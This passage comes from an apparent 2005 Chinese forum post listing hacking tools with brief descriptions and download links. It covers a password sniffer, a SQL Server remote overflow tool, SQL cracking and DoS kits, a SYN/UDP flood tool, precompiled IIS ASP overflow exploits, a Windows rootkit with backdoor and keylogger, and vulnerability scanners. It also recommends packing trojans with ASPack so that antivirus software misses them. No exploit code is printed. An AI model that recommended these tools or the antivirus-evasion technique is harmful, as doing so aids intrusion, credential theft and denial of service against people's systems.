。 2)然後輸入密碼,一旦連接上,你就可以用「進入」按鈕,進入機器。 3)
如果密碼正確,回顯框中就會順利出現fssniffer的歡迎界面。 4)點擊顯示結果
。會在回顯框中顯示出密碼。當然,這時你可以按下「停止顯示」。程序在這個
時候應該不會死機。 5)點擊瀏覽按鈕。選擇目錄。輸入文件名。點擊確定。 6
)然後按保存按鈕。如果順利保存。會出現提示的。這樣你就可以慢慢的看你監
聽到的密碼了。平台:WindowsNT/2000
xptsc

WIN 2000/XP 終端連接程序. 內附有COPY 文件的補丁. 格式 IP
圖檔
ort
MsSqlHack

MS SqlServer2000, SSNETLIB.DLL!ConnectionPreLogin.sprintf 遠程溢出
[url=http://211.155.27.112/bbs/attachment.php?s=&postid=36302]SQLTools
[/url]
SQL的掃瞄探測工具集合,包括:SQLPing,SQLScanner,SQLCracker,SQLDos等。
hgod

HGod V0.51----HUC DoS Tool V0.51
1. 具有SYN/DrDos/UDP/ICMP/IGMP拒絕服務測試功能的選項。
2. 只運行在Win2000/XP以上版本的Windows系統裡。
3. 能夠用來測試網絡安全產品或者常見操作系統的抗拒絕服務性能。
4. 經過測試SYN Flood能夠達到每秒50000個連接請求。
5. 殺傷力強大, 一個SYN Flood線程足以讓Win2000 IIS連接數佔滿而無法訪問。
6. 使用參數比較多, 自己慢慢摸索, 請不要使用本軟件用於破壞行為。
0.51 版功能改進:
1. 增加了ICMP/UDP/IGMP Flood發包時的隨機產生數據包大小的選項。
2. 調整了SYN Flood的線程參數及延時控制。
aspcode

針對IIS的ASP溢出漏洞已編譯好的兩段代碼,有什麼用,想你應該知道,可以試
試.
圖檔
為避免此漏洞和其他已知漏洞,請盡快安裝windows2000SP3。
rootkit

運行於Windows下的rootkit,能夠隱藏進程、開TCP/IP後門、實現內核級shell,
還具有鍵盤Sniffer的功能。最可貴的是,它還提供了程序源代碼。平台:
WinNT/2000
Xscan

一款強大的掃瞄軟件,可以和流光相媲美 採用多線程方式對指定IP地址段(或單
機)進行安全漏洞檢測,支持插件功能,提供了圖形界面和命令行兩種操作方式
,掃瞄內容包括:遠程操作系統類型及版本,標準端口狀態及端口BANNER信息,
SNMP信息,CGI漏洞,IIS漏洞,RPC漏洞,SQL-SERVER、FTP-SERVER、SMTP-
SERVER、POP3-SERVER、NT-SERVER弱口令用戶,NT服務器NETBIOS信息、註冊表信
息等。掃瞄結果保存在/log/目錄中,index_*.htm為掃瞄結果索引文件。 增SSL
插件,用於檢測SSL漏洞;升級PORT、HTTP、IIS插件...(
[url=http://go.6to23.com/aihouling/wwwroot/toolsdownload/X-way2.5.zip]
x-way2.5[/url]

採用多線程形式對服務器系統進行漏洞掃瞄和安全測試工具,X-WAY多個版本均在
Win2000下開發,建議用戶使用時候也在Win2000環境,以發揮最佳效果...(中文
版)《掃瞄工具,別忘了x-way2.5》
下面的軟件本來不想收進來給大家看,因為頂級黑客不入侵個人電腦,基本不用
別人寫的木馬,肯定是人手一個(自己編寫的木馬)
沒有任何殺毒軟件能查出來的。
***********************************************************************
***********************
使用木馬改造工具:
[url=http://secrecy.ayinfo.ha.cn/jiemi/unshell/Aspack%20Die%201.1.rar]
ASPack[/url]

這個是使用木馬都一定要會用的工具,它能壓縮木馬,不讓殺毒軟件查出來!
***********************************************************************


最後由 dick 於 2005-12-23, 19:53 編輯,總共編輯了 2 次。

離線
 個人資料 發送私人訊息  
 
顯示文章 :  排序  
 
 1 頁 (共 1 頁) [ 1 篇文章 ] 

所有顯示的時間為 UTC + 8 小時


 

誰在線上

正在瀏覽這個版面的使用者:沒有註冊會員 和 2 位訪客

 

不能 在這個版面發表主題
不能 在這個版面回覆主題
不能 在這個版面編輯您的文章
不能 在這個版面刪除您的文章
不能 在這個版面上傳附加檔案

前往 :  

cron
phpBB © & skin Powered by: Headquarters & phpBB Group